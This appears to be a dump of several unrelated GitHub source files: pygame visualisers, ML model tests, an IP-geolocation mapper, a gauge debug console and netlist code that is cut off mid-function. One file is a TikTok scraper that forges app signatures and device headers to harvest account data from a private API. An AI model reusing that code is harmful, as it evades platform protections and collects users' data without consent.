+{"seq_id":"23132176977","text":"import os\nimport pygame\nimport time\nimport random\n\nlast_point = [320, 0]\nlast_point1 = [320, 0]\n\n\ndef setup(screen, etc):\n pass\n\ndef draw(screen, etc):\n \n global last_point, last_point1, speed\n \n linewidth = int(etc.knob1*10)+1\n #lines = int(etc.knob2*89)+10\n #lines2\n lines = 72#int(65-(etc.knob2*65))+7\n spacehoriz = 180*etc.knob2+18\n spacevert = spacehoriz\n recsize = 10*etc.knob3\n #if recsize <1 : recsize = 0\n \n \n \n \n for m in range(0, lines) :\n \n #space = int(1280/lines)\n x = m*spacehoriz\n y = 0\n auDio = etc.audio_in[m] / 35\n color = etc.color_picker()\n if auDio < 0 : auDio = 0\n pygame.draw.line(screen, color, [x,y], [x, y + auDio], linewidth)\n if recsize >= 1 :\n pygame.draw.rect(screen, color, [x-(recsize/2),y+auDio,recsize,recsize], 0)\n \n for i in range(0, lines) :\n \n #space = int(1280/lines)\n x = i*spacehoriz\n y = 720\n auDio = etc.audio_in[i] / 35\n color = etc.color_picker()\n if auDio > 0 : auDio = 0\n pygame.draw.line(screen, color, [x,y], [x, y - -auDio], linewidth)\n if recsize >= 1 :\n pygame.draw.rect(screen, color, [x-(recsize/2),y+auDio,recsize,recsize], 0) \n \n for j in range(0, lines) :\n \n space = j*spacehoriz\n \n pygame.draw.line(screen, color, (0,space), (1280,space), linewidth)\n \n \n \n \n ","repo_name":"critterandguitari/ETC_Modes","sub_path":"S - Mirror Grid/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"35"}
+{"seq_id":"16447370923","text":"import pandas as pd\nimport pytest\nimport os\nimport numpy as np\nimport pickle\nfrom model.ml.data import process_data\nfrom model.ml.model import compute_model_metrics, inference\nimport logging\n\nlogging.basicConfig(level=logging.INFO, format=\"%(asctime)-15s %(message)s\")\nlogger = logging.getLogger()\n\n\nTEST_DATA_PATH = \"data/raw-census.csv\"\nMODEL_PATH = \"model/saved_models/saved_model.pkl\"\nENCODER_PATH = \"model/saved_models/saved_encoder.pkl\"\nLB_PATH = \"model/saved_models/saved_lb.pkl\"\n\n\n@pytest.fixture\ndef data():\n \"\"\"Load some test data.\"\"\"\n\n if os.path.isfile(TEST_DATA_PATH):\n logger.info(f\"Loading data file {TEST_DATA_PATH}\")\n data = pd.read_csv(TEST_DATA_PATH, nrows=200)\n else:\n logger.info(f\"Data file {TEST_DATA_PATH} not found\")\n exit()\n\n return data\n\n\n@pytest.fixture\ndef cat_features():\n cat_features = [\n \"workclass\",\n \"education\",\n \"marital-status\",\n \"occupation\",\n \"relationship\",\n \"race\",\n \"sex\",\n \"native-country\",\n ]\n return cat_features\n\n\n@pytest.fixture\ndef model():\n return pickle.load(open(MODEL_PATH, \"rb\"))\n\n\n@pytest.fixture\ndef encoder():\n return pickle.load(open(ENCODER_PATH, \"rb\"))\n\n\n@pytest.fixture\ndef lb():\n return pickle.load(open(LB_PATH, \"rb\"))\n\n\ndef test_process_data(data, cat_features):\n\n X_train, y_train, encoder, lb = process_data(\n data, categorical_features=cat_features, label=\"salary\", training=True\n )\n\n assert (\n X_train.shape[0] == data.shape[0]\n ), \"Wrong number of rows in source data\"\n\n assert (\n X_train.shape[1] > data.shape[1]\n ), \"Wrong number of features in processed data\"\n\n assert (\n y_train.shape[0] == data.shape[0]\n ), \"Wrong shape of y_train rows after processing data\"\n\n\ndef test_compute_model_metrics():\n\n y = np.array([0, 0, 0, 0, 0, 0, 0, 1, 1, 1])\n preds = np.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1])\n precision, recall, fbeta = compute_model_metrics(y, preds)\n\n assert precision > 0.9\n assert recall > 0.6\n assert fbeta > 0.6\n\n\ndef test_inference(model, encoder, lb, data, cat_features):\n \"\"\"Test model inference\"\"\"\n\n X_test, y_test, encoder, lb = process_data(\n data,\n categorical_features=cat_features,\n encoder=encoder,\n lb=lb,\n label=\"salary\",\n training=False,\n )\n\n y_pred = inference(model, X_test)\n\n assert y_pred.shape[0] == X_test.shape[0], \"Wrong predictions shape\"\n pred_average = np.average(y_pred)\n assert (\n 1 >= pred_average >= 0\n ), \"Prediction average of {pred_average} is not between 0 and 1\"\n\n\n# if __name__ == \"__main__\":\n\n# test_inference(model(), encoder(), lb(), data(), cat_features())\n# test_compute_model_metrics()\n# test_process_data(data(), cat_features())\n","repo_name":"ainfinum/mlops-project3","sub_path":"tests/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"11278248011","text":"from __future__ import division\nimport pygame, sys\nfrom pygame.locals import *\npygame.init()\n\n\"\"\" ericbic.py\nby Eric J.Parfitt (ejparfitt@gmail.com)\n\nThis program is designed for coding and decoding the roman alphabet\ninto and out of a character set I made up. My characters are all made\nup of either one or two of a set of four different character parts which\ncan be combined in different ways to get a total of 30 new characters.\n\nVersion: 1.0 alpha\n\"\"\"\n\nWIDTH = 500\nHEIGHT = 400\n\nwindowSurface = pygame.display.set_mode((WIDTH, HEIGHT), 0, 32)\n\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\n\nFPS = 60\nclock = pygame.time.Clock()\n\nclass Icon:\n def __init__(self, image, position=(0, 0)):\n self.image = image\n self.rect = image.get_rect()\n self.rect.x = position[0]\n self.rect.y = position[1]\n\nclass Canvas:\n def __init__(self):\n self.isTop = self.isBottom = self.isFlipped = self.isReset = False\n self.text = None\n self.bottomHalf = None\n self.topHalf = None\n \n def getIcon(self, pallet, mouseLoc):\n for i in range(len(pallet)):\n icon = pallet[i]\n if icon.rect.collidepoint(mouseLoc):\n newIcon = Icon(icon.image)\n return newIcon, i\n return None, None\n \n def tryAdd(self, pallet, mouseLoc, position):\n for i in range(len(pallet)):\n icon = pallet[i]\n if icon.rect.collidepoint(mouseLoc):\n newIcon = Icon(icon.image, position)\n windowSurface.blit(newIcon.image, newIcon.rect)\n return i\n\n def moveBottomHalf(self, bottomHalf, topHalf):\n self.bottomHalf.rect.topleft = self.topHalf.rect.bottomright\n self.bottomHalf.rect.move_ip(0, -int(round(CURVE_WIDTH)))\n \n def update(self, isClick, letter):\n mouseLoc = pygame.mouse.get_pos()\n if letter is not None:\n if self.isFlipped:\n for icon in pallet:\n icon.image = pygame.transform.flip(icon.image, False,\n True)\n pygame.draw.rect(windowSurface, WHITE, icon.rect)\n windowSurface.blit(icon.image, icon.rect)\n self.isFlipped = False\n letter = letter.capitalize()\n row, col = next(((i, row.index(letter)) for i, row in\n enumerate(alphabet) if letter in row), (None, None))\n if row is not None:\n self.isReset = True\n oldTopHalf = self.topHalf\n oldBottomHalf = self.bottomHalf\n self.topHalf = Icon(pallet[row].image, TOP_CO)\n if col != 0:\n self.bottomHalf = Icon(pallet[col - 1].image)\n self.moveBottomHalf(self.bottomHalf, self.topHalf)\n else:\n self.bottomHalf = None\n if self.topHalf is not None:\n for icon in [oldTopHalf, oldBottomHalf]:\n if icon is not None:\n pygame.draw.rect(windowSurface, WHITE,\n icon.rect)\n windowSurface.blit(self.topHalf.image,\n self.topHalf.rect)\n if self.bottomHalf is not None:\n self.bottomHalf.image = pygame.transform.flip(\n self.bottomHalf.image, False, True)\n windowSurface.blit(self.bottomHalf.image,\n self.bottomHalf.rect)\n if self.text is not None:\n pygame.draw.rect(windowSurface, WHITE, self.text.rect) \n self.text = Icon(font.render(letter, True, BLACK), (300, 300))\n windowSurface.blit(self.text.image, self.text.rect)\n pygame.display.flip() \n letter = None\n elif isClick:\n newIcon, index = (self.getIcon(pallet, mouseLoc))\n if newIcon is not None:\n if self.isReset:\n for icon in [self.topHalf, self.bottomHalf]:\n if icon is not None:\n pygame.draw.rect(windowSurface, WHITE,\n icon.rect)\n self.isTop = self.isBottom = self.isReset = False\n if not (self.isTop and self.isBottom):\n if not self.isTop:\n self.isTop = True\n self.topHalf = newIcon\n self.topIndex = index\n self.topHalf.rect.topleft = TOP_CO\n 
windowSurface.blit(self.topHalf.image,\n self.topHalf.rect)\n letter = alphabet[self.topIndex][0]\n else:\n self.isBottom = True\n self.bottomHalf = newIcon\n bottomIndex = index\n self.moveBottomHalf(self.bottomHalf, self.topHalf)\n windowSurface.blit(self.bottomHalf.image,\n self.bottomHalf.rect)\n letter = alphabet[self.topIndex][bottomIndex + 1]\n self.isReset = True\n if self.text is not None:\n pygame.draw.rect(windowSurface, WHITE, self.text.rect) \n self.text = Icon(font.render(letter, True, BLACK),\n (300, 300))\n for icon in pallet:\n #if icon is not None:\n pygame.draw.rect(windowSurface, WHITE, icon.rect)\n icon.image = pygame.transform.flip(icon.image, False,\n True)\n windowSurface.blit(icon.image, icon.rect)\n self.isFlipped = not self.isFlipped\n windowSurface.blit(self.text.image, self.text.rect)\n pygame.display.flip()\n letter = None\n clock.tick(FPS)\n return letter\n\nwindowSurface.fill(WHITE)\nimageFiles = [\"EribicBump.png\", \"EribicSpike.png\", \"EribicLoop.png\",\n \"EribicLeftWave.png\", \"EribicRightWave.png\"]\npallet = [Icon(pygame.image.load(image)) for image in imageFiles]\nnoneSymbol = \"?\"\nalphabet = [[\"N\", \"U\", \"M\", \"R\", \"F\", noneSymbol],\n [\"I\", \"C\", \"T\", \"J\", \"V\", \"G\"], [\"E\", \"L\", \"H\", \"O\", \"K\", \"B\"],\n [\"A\", \"D\", \"Y\", \"Q\", noneSymbol, \"W\"],\n [\"S\", noneSymbol, \"P\", \"Z\", \"X\", noneSymbol]]\nletter = None\nfont = pygame.font.SysFont(\"comicsansms\", 72)\nICON_HEIGHT = 50\nORIGINAL_ICON_HEIGHT = 75.328\nORIGINAL_CURVE_WIDTH = 2.5\nCURVE_WIDTH = (ICON_HEIGHT / ORIGINAL_ICON_HEIGHT) * ORIGINAL_CURVE_WIDTH\nTOP_CO = (50, 200)\nwidthTotal = 0\nfor icon in pallet:\n width = icon.image.get_width() * ICON_HEIGHT / icon.image.get_height()\n icon.image = pygame.transform.smoothscale(icon.image, \n (int(round(width)), ICON_HEIGHT))\n icon.rect = icon.image.get_rect()\n widthTotal += width\nxLoc = 0\nfor i in range(len(pallet)):\n icon = pallet[i]\n icon.rect.x = xLoc\n windowSurface.blit(icon.image, icon.rect)\n xLoc += icon.image.get_width() + (WIDTH - widthTotal) / (len(pallet) - 1)\nisFlipped = False\npygame.display.flip()\ncanvas = Canvas()\n\nwhile(True):\n isClick = False\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == MOUSEBUTTONDOWN:\n if event.button == 1:\n isClick = True\n elif event.type == KEYDOWN:\n if event.unicode.isalpha():\n letter = event.unicode\n letter = canvas.update(isClick, letter)\n","repo_name":"esopsis/Ericbic","sub_path":"eribic.py","file_name":"eribic.py","file_ext":"py","file_size_in_byte":7762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"31665849587","text":"import sqlite3\nimport re\nimport pandas as pd\nimport plotly.express as px\nimport requests\n\ndef main():\n # mapCountryData()\n # Should create mkdir method\n ipList = retrieveAllIpAddress()\n\n if (len(ipList) > 0): \n ipHashMap = mapIpToCoordinates(ipList)\n updateDatabaseWithCoordinates(ipHashMap)\n else:\n print(\"no ip addresses needed to retrieve coordinates\")\n \n mapCountryDataWithDb()\n groupDataByMonths()\n\ndef retrieveAllIpAddress():\n print(\"retrieving ip addresses from table\")\n\n dbconn = sqlite3.connect(\"tracking.db\", timeout=60)\n cursor = dbconn.cursor()\n\n select_all_ips_query = \"SELECT ip_address FROM tool_download_count WHERE coord_updated IS FALSE\"\n ipList_raw = cursor.execute(select_all_ips_query)\n\n ipList = [i[0] for i in ipList_raw]\n\n return ipList\n\ndef chunks(l, n):\n \"\"\"Yield successive n-sized chunks from l.\"\"\"\n for i in range(0, len(l), n):\n yield l[i:i + n]\n\n\ndef requestIpApi(listofIp, ipToMetaMap):\n url = 'http://ip-api.com/batch'\n\n response = requests.post(url, json=listofIp)\n if response: \n responseJson = response.json()\n if responseJson:\n for obj in responseJson:\n ip = obj['query']\n ipToMetaMap[ip] = obj\n else:\n print('status raise', response.raise_for_status())\n else: \n print('status code', response.status_code)\n\n return ipToMetaMap\n\n# 100 IP address MAX\nMAX_API_BATCH_SIZE = 50\n\ndef mapIpToCoordinates(listofIp):\n print(\"batch conversion of Ip address by 100\")\n \n ipToMetaMap = {}\n for batch in chunks(listofIp, MAX_API_BATCH_SIZE):\n batch_done = requestIpApi(batch, ipToMetaMap)\n ipToMetaMap.update(batch_done)\n\n return ipToMetaMap\n\n\ndef updateDatabaseWithCoordinates(ipMap):\n print(\"update table with lat / lon coordinates\")\n\n dbconn = sqlite3.connect(\"tracking.db\", timeout=60)\n cursor = dbconn.cursor()\n\n for key in ipMap:\n ipx = key\n lat = \"\"\n lon = \"\"\n country = \"\"\n regionName = \"\"\n city = \"\"\n zip = \"\"\n\n if ipMap[key]['status'] == \"success\":\n lat = ipMap[ipx]['lat']\n lon = ipMap[ipx]['lon']\n country = ipMap[ipx]['country']\n regionName = ipMap[ipx]['regionName']\n city = ipMap[ipx]['city']\n zip = ipMap[ipx]['zip']\n\n cursor.execute(\n '''UPDATE tool_download_count SET ip_lat=?, ip_long=?, country=?, region=?, city=?, zip=?, coord_updated=? \\\n WHERE ip_address=? 
AND coord_updated IS FALSE''', (lat, lon, country, regionName, city, zip, 1, ipx))\n\n dbconn.commit()\n\ndef mapCountryDataWithDb():\n # Testing panda scatter geo plot with select db import\n dbconn = sqlite3.connect(\"tracking.db\", timeout=60)\n\n df = pd.read_sql_query(\"SELECT * FROM tool_download_count WHERE coord_updated IS TRUE\", dbconn)\n\n fig = px.scatter_geo(df, lat='ip_lat',\n lon='ip_long', hover_name=\"city\",\n width=800, height=400)\n\n fig.update_layout(plot_bgcolor=\"rgba(0, 0, 0, 0)\", paper_bgcolor=\"rgba(0, 0, 0, 0)\", margin=dict(l=0, r=0, t=0, b=0))\n\n fig.show()\n\n # Using kaleido - export in PNG\n fig.write_image(\"map/images/output.png\")\n\n # Export in HTML\n fig.write_html(\"map/html/output.html\")\n\ndef groupDataByMonths():\n dbconn = sqlite3.connect(\"tracking.db\", timeout=60)\n\n df = pd.read_sql_query(\"SELECT * FROM tool_download_count WHERE coord_updated IS TRUE\", dbconn)\n\n df['Year'] = pd.to_datetime(df['date_download']).dt.year\n df['Month'] = pd.to_datetime(df['date_download']).dt.month\n\n g = df.groupby([('Year'), ('Month')]).sum().to_json(r\"map/json/map_months.json\")\n # print(g)\n\ndef mapCountryData():\n # Testing panda scatter geo plot with csv import\n\n df = pd.read_csv(\"csv/countries.csv\")\n\n fig = px.scatter_geo(df, lat='latitude',\n lon='longitude', hover_name=\"name\")\n fig.update_layout(title='World map', title_x=0.5)\n fig.show()\n\n\n# Call main\nif __name__ == \"__main__\":\n main()\n","repo_name":"jessewoo/githubStats","sub_path":"map/mapDb.py","file_name":"mapDb.py","file_ext":"py","file_size_in_byte":4118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
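updateDatabaseWithCoordinates above issues one UPDATE per address; sqlite3 can take the whole batch in a single executemany call. A sketch reusing the record's table and ipMap shape (unlike the original, failed lookups are simply skipped here rather than written back as empty strings):

import sqlite3

def update_coordinates(db_path, ip_map):
    rows = [
        (m['lat'], m['lon'], m['country'], m['regionName'], m['city'],
         m['zip'], 1, ip)
        for ip, m in ip_map.items() if m.get('status') == 'success'
    ]
    # the connection context manager commits on success, rolls back on error
    with sqlite3.connect(db_path, timeout=60) as conn:
        conn.executemany(
            "UPDATE tool_download_count "
            "SET ip_lat=?, ip_long=?, country=?, region=?, city=?, zip=?, coord_updated=? "
            "WHERE ip_address=? AND coord_updated IS FALSE",
            rows,
        )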
+{"seq_id":"30942129302","text":"#!/usr/bin/python3\n\n\"\"\"\ninitialize Isotemp water bath, then provide user with an interactive console for debugging\n\"\"\"\n\nimport convectron475 as convectron\nimport traceback\n\ngauge = convectron.ConvectronController(port=\"/dev/cu.usbserial-ftE17ZWN\")\n\nwhile True:\n\tcmd = input(\"gauge.\")\n\ttry:\n\t\tret = eval(\"gauge.{}\".format(cmd))\n\t\tprint(ret)\n\texcept:\n\t\ttraceback.print_exc()\n\t\tgauge.disconnect()","repo_name":"octopode/pyvectron","sub_path":"convectrontest.py","file_name":"convectrontest.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"}
+{"seq_id":"70058091300","text":"import time\nimport string\nimport requests\nimport itertools\n\nfrom urllib.parse import urlencode\nfrom utils.signer import *\n\nclass Verifinder:\n def __init__(self, proxy: str or None = None, count: int = 4) -> None:\n self.proxies = {'http': f'http://{proxy}', 'https': f'http://{proxy}'} if proxy else None\n self.accounts = []\n self.keywords = get_keywords(count)\n\n def __base_params(self, keyword: str, cursor: int = 0) -> str:\n return urlencode({\n \"count\" : 30,\n \"cursor\" : cursor,\n \"keyword\" : keyword,\n \"search_source\" : \"report_user\",\n \"type\" : 1,\n \"request_tag_from\" : \"h5\",\n \"storage_type\" : 0,\n \"iid\" : 7137816409338136325,\n \"channel\" : \"googleplay\",\n \"device_type\" : \"SM-G973N\",\n \"device_id\" : 6990239216324986369,\n \"os_version\" : 9,\n \"version_code\" : 160904,\n \"app_name\" : \"musically_go\",\n \"device_brand\" : \"samsung\",\n \"device_platform\" : \"android\",\n \"aid\" : 1340,\n })\n \n def __base_headers(self, params: str) -> dict:\n sig = XGorgon(\n params = params\n ).get_value()\n \n return {\n \"accept-encoding\" : \"gzip\",\n \"sdk-version\" : \"2\",\n \"x-ss-req-ticket\" : str(int(time.time() * 1000)),\n \"x-khronos\" : sig[\"X-Khronos\"],\n \"x-gorgon\" : sig[\"X-Gorgon\"],\n \"host\" : \"api16-normal-c-useast1a.tiktokv.com\",\n \"connection\" : \"Keep-Alive\",\n \"user-agent\" : \"okhttp/3.10.0.1\"\n }\n \n def __scrape_veris(self, keyword: str, cursor: int = 0) -> requests.Response:\n __base_params = self.__base_params(keyword, cursor)\n \n return requests.get(\n url = (\n \"https://api16-normal-c-useast1a.tiktokv.com\"\n + \"/aweme/v1/discover/search/?\"\n + __base_params \n ),\n headers = self.__base_headers(__base_params)\n )\n \n def main(self):\n cursor = 0\n for keyword in self.keywords:\n while True:\n try:\n __scrape_req = self.__scrape_veris(keyword, cursor)\n # print(__scrape_req.text)\n for _ in __scrape_req.json()[\"user_list\"]:\n if _[\"user_info\"][\"unique_id\"] not in self.accounts:\n \n self.accounts.append(_[\"user_info\"][\"unique_id\"])\n info_string = f'{_[\"user_info\"][\"unique_id\"]}:{_[\"user_info\"][\"follower_count\"]}:{_[\"user_info\"][\"uid\"]}:{_[\"user_info\"][\"sec_uid\"]}:{_[\"user_info\"][\"region\"]}'\n \n print(info_string)\n \n with open(\"utils/veris.txt\") as file:\n file.write(info_string + \"\\n\")\n \n if len(__scrape_req.json()[\"user_list\"]) == 0:\n cursor = 0\n break\n \n cursor += 30 if cursor < 30 else 31\n \n except Exception:\n cursor = 0\n break\n \nif __name__ == \"__main__\":\n Verifinder().main()","repo_name":"xtekky/TikTok-Verified-Scraper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3588,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"35"}
+{"seq_id":"23279257994","text":"from functools import cmp_to_key\nfrom itertools import chain\nfrom typing import *\n\nimport edgir\nfrom edg_core import *\nfrom . import footprint as kicad\n\n\nclass InvalidNetlistBlockException(BaseException):\n pass\n\n\nclass InvalidPackingException(BaseException):\n pass\n\n\nclass Netlist(NamedTuple): # TODO use TransformUtil.Path across the board\n blocks: Dict[str, kicad.Block] # block name: footprint name\n nets: Dict[str, List[kicad.Pin]] # net name: list of member pins\n\n\nBlocks = Dict[TransformUtil.Path, kicad.Block] # path -> Block\nEdges = Dict[TransformUtil.Path, List[TransformUtil.Path]] # Pins (block name, port / pin name) -> net-connected Pins\nAssertConnected = List[Tuple[TransformUtil.Path, TransformUtil.Path]]\nNames = Dict[TransformUtil.Path, TransformUtil.Path] # Path -> shortened path name\nClassPaths = Dict[TransformUtil.Path, List[str]] # Path -> class names corresponding to shortened path name\nclass NetlistTransform(TransformUtil.Transform):\n @staticmethod\n def path_to_pin(path: TransformUtil.Path) -> kicad.Pin:\n assert not path.links and not path.params\n return kicad.Pin('.'.join(path.blocks), '.'.join(path.ports))\n\n @staticmethod\n def flatten_port(path: TransformUtil.Path, port: edgir.PortLike) -> Iterable[TransformUtil.Path]:\n if port.HasField('port'):\n return [path]\n elif port.HasField('array') and port.array.HasField('ports'):\n return chain(*[NetlistTransform.flatten_port(path.append_port(port_pair.name), port_pair.value)\n for port_pair in port.array.ports.ports])\n else:\n raise ValueError(f\"don't know how to flatten netlistable port {port}\")\n\n def __init__(self, design: CompiledDesign, refdes_mode: str = \"pathName\"):\n self.blocks: Blocks = {}\n self.edges: Edges = {}\n self.assert_connected: AssertConnected = []\n self.short_paths: Names = {TransformUtil.Path.empty(): TransformUtil.Path.empty()} # seed root\n self.class_paths: ClassPaths = {TransformUtil.Path.empty(): []} # seed root\n self.pins: Set[TransformUtil.Path] = set()\n self.names: Names = {}\n\n self.design = design\n self.refdes_mode = refdes_mode\n\n def process_blocklike(self, path: TransformUtil.Path, block: Union[edgir.Link, edgir.LinkArray, edgir.HierarchyBlock]) -> None:\n # generate short paths for children first\n short_path = self.short_paths[path]\n class_path = self.class_paths[path]\n\n # TODO handle mixed net/connect operations\n if isinstance(block, edgir.Link) and 'nets' in block.meta.members.node:\n # Consolidate single-net link ports into just the link\n for port_pair in block.ports:\n self.short_paths[path.append_port(port_pair.name)] = short_path\n\n else:\n for port_pair in block.ports:\n self.short_paths[path.append_port(port_pair.name)] = short_path.append_port(port_pair.name)\n\n for link_pair in block.links:\n self.short_paths[path.append_link(link_pair.name)] = short_path.append_link(link_pair.name)\n self.class_paths[path.append_link(link_pair.name)] = class_path + [link_pair.value.link.self_class.target.name]\n\n main_internal_blocks: Dict[str, edgir.BlockLike] = {}\n other_internal_blocks: Dict[str, edgir.BlockLike] = {}\n if isinstance(block, edgir.HierarchyBlock):\n for block_pair in block.blocks:\n subblock = block_pair.value\n # ignore pseudoblocks like bridges and adapters that have no internals\n if not subblock.hierarchy.blocks and 'fp_is_footprint' not in subblock.hierarchy.meta.members.node:\n other_internal_blocks[block_pair.name] = block_pair.value\n else:\n main_internal_blocks[block_pair.name] = 
block_pair.value\n\n if len(main_internal_blocks) == 1:\n name = list(main_internal_blocks.keys())[0]\n self.short_paths[path.append_block(name)] = short_path\n self.class_paths[path.append_block(name)] = class_path\n else:\n for (name, subblock) in main_internal_blocks.items():\n self.short_paths[path.append_block(name)] = short_path.append_block(name)\n self.class_paths[path.append_block(name)] = class_path + [subblock.hierarchy.self_class.target.name]\n\n for (name, subblock) in other_internal_blocks.items():\n self.short_paths[path.append_block(name)] = short_path.append_block(name)\n self.class_paths[path.append_block(name)] = class_path + [subblock.hierarchy.self_class.target.name]\n\n if 'nets' in block.meta.members.node:\n # add all-pairs edges\n # list conversion to deal with iterable-once\n flat_ports = list(chain(*[self.flatten_port(path.append_port(port_pair.name), port_pair.value)\n for port_pair in block.ports]))\n for src_path in flat_ports:\n for dst_path in flat_ports:\n if src_path != dst_path:\n self.edges.setdefault(src_path, []).append(dst_path)\n\n if 'nets_packed' in block.meta.members.node:\n # this connects the first source to all destinations, then asserts all the sources are equal\n # this leaves the sources unconnected, to be connected externally and checked at the end\n src_port_name = block.meta.members.node['nets_packed'].members.node['src'].text_leaf\n dst_port_name = block.meta.members.node['nets_packed'].members.node['dst'].text_leaf\n flat_srcs = list(self.flatten_port(path.append_port(src_port_name), edgir.pair_get(block.ports, src_port_name)))\n flat_dsts = list(self.flatten_port(path.append_port(dst_port_name), edgir.pair_get(block.ports, dst_port_name)))\n assert flat_srcs, \"missing source port(s) for packed net\"\n for dst_path in flat_dsts:\n self.edges.setdefault(flat_srcs[0], []).append(dst_path)\n self.edges.setdefault(dst_path, []).append(flat_srcs[0])\n for src_path in flat_srcs: # assert all sources connected\n for dst_path in flat_srcs:\n self.assert_connected.append((src_path, dst_path))\n\n if 'fp_is_footprint' in block.meta.members.node:\n footprint_name = self.design.get_value(path.to_tuple() + ('fp_footprint',))\n footprint_pinning = self.design.get_value(path.to_tuple() + ('fp_pinning',))\n mfr = self.design.get_value(path.to_tuple() + ('fp_mfr',))\n part = self.design.get_value(path.to_tuple() + ('fp_part',))\n value = self.design.get_value(path.to_tuple() + ('fp_value',))\n refdes = self.design.get_value(path.to_tuple() + ('fp_refdes',))\n lcsc_part = self.design.get_value(path.to_tuple() + ('lcsc_part',))\n\n assert isinstance(footprint_name, str)\n assert isinstance(footprint_pinning, list)\n assert isinstance(mfr, str) or mfr is None\n assert isinstance(part, str) or part is None\n assert isinstance(value, str) or value is None\n assert isinstance(lcsc_part, str) or lcsc_part is None\n assert isinstance(refdes, str)\n\n part_comps = [\n part,\n f\"({mfr})\" if mfr else \"\"\n ]\n part_str = \" \".join(filter(None, part_comps))\n value_comps = [\n part_str,\n value\n ]\n value_str = \" - \".join(filter(None, value_comps))\n\n self.blocks[path] = kicad.Block(\n footprint_name,\n refdes,\n part_str,\n\n # Uncomment one to set value field\n # TODO this should be a user flag\n value_str, # including manufacturer\n # lcsc_part or \"\",\n\n list(path.blocks),\n list(self.short_paths[path].blocks),\n self.class_paths[path],\n )\n\n if self.refdes_mode == \"pathName\":\n self.names[path] = self.short_paths[path]\n elif self.refdes_mode == 
\"refdes\":\n self.names[path] = TransformUtil.Path.empty().append_block(refdes)\n else:\n raise ValueError(f\"Invalid valueMode value {self.refdes_mode}\")\n\n for pin_spec in footprint_pinning:\n assert isinstance(pin_spec, str)\n pin_spec_split = pin_spec.split('=')\n assert len(pin_spec_split) == 2\n pin_name = pin_spec_split[0]\n port_path = edgir.LocalPathList(pin_spec_split[1].split('.'))\n\n pin_path = path.append_port(pin_name)\n self.pins.add(pin_path)\n self.short_paths[pin_path] = short_path.append_port(pin_name)\n\n src_path = path.follow(port_path, block)[0]\n\n # Create a unidirectional edge from the port to the footprint pin\n self.edges.setdefault(src_path, []).append(pin_path)\n self.edges.setdefault(pin_path, []) # create a dummy entry\n\n self.names[pin_path] = self.names[path].append_port(pin_name)\n\n for constraint_pair in block.constraints:\n if constraint_pair.value.HasField('connected'):\n self.process_connected(path, block, constraint_pair.value.connected)\n elif constraint_pair.value.HasField('exported'):\n self.process_exported(path, block, constraint_pair.value.exported)\n elif constraint_pair.value.HasField('exportedTunnel'):\n self.process_exported(path, block, constraint_pair.value.exportedTunnel)\n elif constraint_pair.value.HasField('connectedArray'):\n for expanded_connect in constraint_pair.value.connectedArray.expanded:\n self.process_connected(path, block, expanded_connect)\n elif constraint_pair.value.HasField('exportedArray'):\n for expanded_export in constraint_pair.value.exportedArray.expanded:\n self.process_exported(path, block, expanded_export)\n\n def process_connected(self, path: TransformUtil.Path, current: edgir.EltTypes, constraint: edgir.ConnectedExpr) -> None:\n if constraint.expanded:\n assert len(constraint.expanded) == 1\n self.process_connected(path, current, constraint.expanded[0])\n return\n assert constraint.block_port.HasField('ref')\n assert constraint.link_port.HasField('ref')\n self.connect_ports(\n path.follow(constraint.block_port.ref, current),\n path.follow(constraint.link_port.ref, current))\n\n def process_exported(self, path: TransformUtil.Path, current: edgir.EltTypes, constraint: edgir.ExportedExpr) -> None:\n if constraint.expanded:\n assert len(constraint.expanded) == 1\n self.process_exported(path, current, constraint.expanded[0])\n return\n assert constraint.internal_block_port.HasField('ref')\n assert constraint.exterior_port.HasField('ref')\n self.connect_ports(\n path.follow(constraint.internal_block_port.ref, current),\n path.follow(constraint.exterior_port.ref, current))\n\n def connect_ports(self, elt1: Tuple[TransformUtil.Path, edgir.EltTypes], elt2: Tuple[TransformUtil.Path, edgir.EltTypes]) -> None:\n \"\"\"Recursively connect ports as applicable\"\"\"\n if isinstance(elt1[1], edgir.Port) and isinstance(elt2[1], edgir.Port):\n self.edges.setdefault(elt1[0], []).append(elt2[0])\n self.edges.setdefault(elt2[0], []).append(elt1[0])\n elif isinstance(elt1[1], edgir.Bundle) and isinstance(elt2[1], edgir.Bundle):\n elt1_names = list(map(lambda pair: pair.name, elt1[1].ports))\n elt2_names = list(map(lambda pair: pair.name, elt2[1].ports))\n assert elt1_names == elt2_names, f\"mismatched bundle types {elt1}, {elt2}\"\n for key in elt2_names:\n self.connect_ports(\n (elt1[0].append_port(key), edgir.resolve_portlike(edgir.pair_get(elt1[1].ports, key))),\n (elt2[0].append_port(key), edgir.resolve_portlike(edgir.pair_get(elt2[1].ports, key))))\n # don't need to create the bundle connect, since Bundles can't be 
CircuitPorts\n else:\n raise ValueError(f\"can't connect types {elt1}, {elt2}\")\n\n def visit_portlike(self, context: TransformUtil.TransformContext, port: edgir.PortLike) -> None:\n self.pins.add(context.path)\n\n short_path = self.short_paths[context.path]\n if port.HasField('bundle'): # TODO maybe shorten if just one?\n for port_pair in port.bundle.ports:\n self.short_paths[context.path.append_port(port_pair.name)] = short_path.append_port(port_pair.name)\n elif port.HasField('array') and port.array.HasField('ports'):\n for port_pair in port.array.ports.ports:\n self.short_paths[context.path.append_port(port_pair.name)] = short_path.append_port(port_pair.name)\n\n def visit_block(self, context: TransformUtil.TransformContext, block: edgir.BlockTypes) -> None:\n self.process_blocklike(context.path, block)\n\n def visit_link(self, context: TransformUtil.TransformContext, link: edgir.Link) -> None:\n self.process_blocklike(context.path, link)\n\n def visit_linkarray(self, context: TransformUtil.TransformContext, link: edgir.LinkArray) -> None:\n 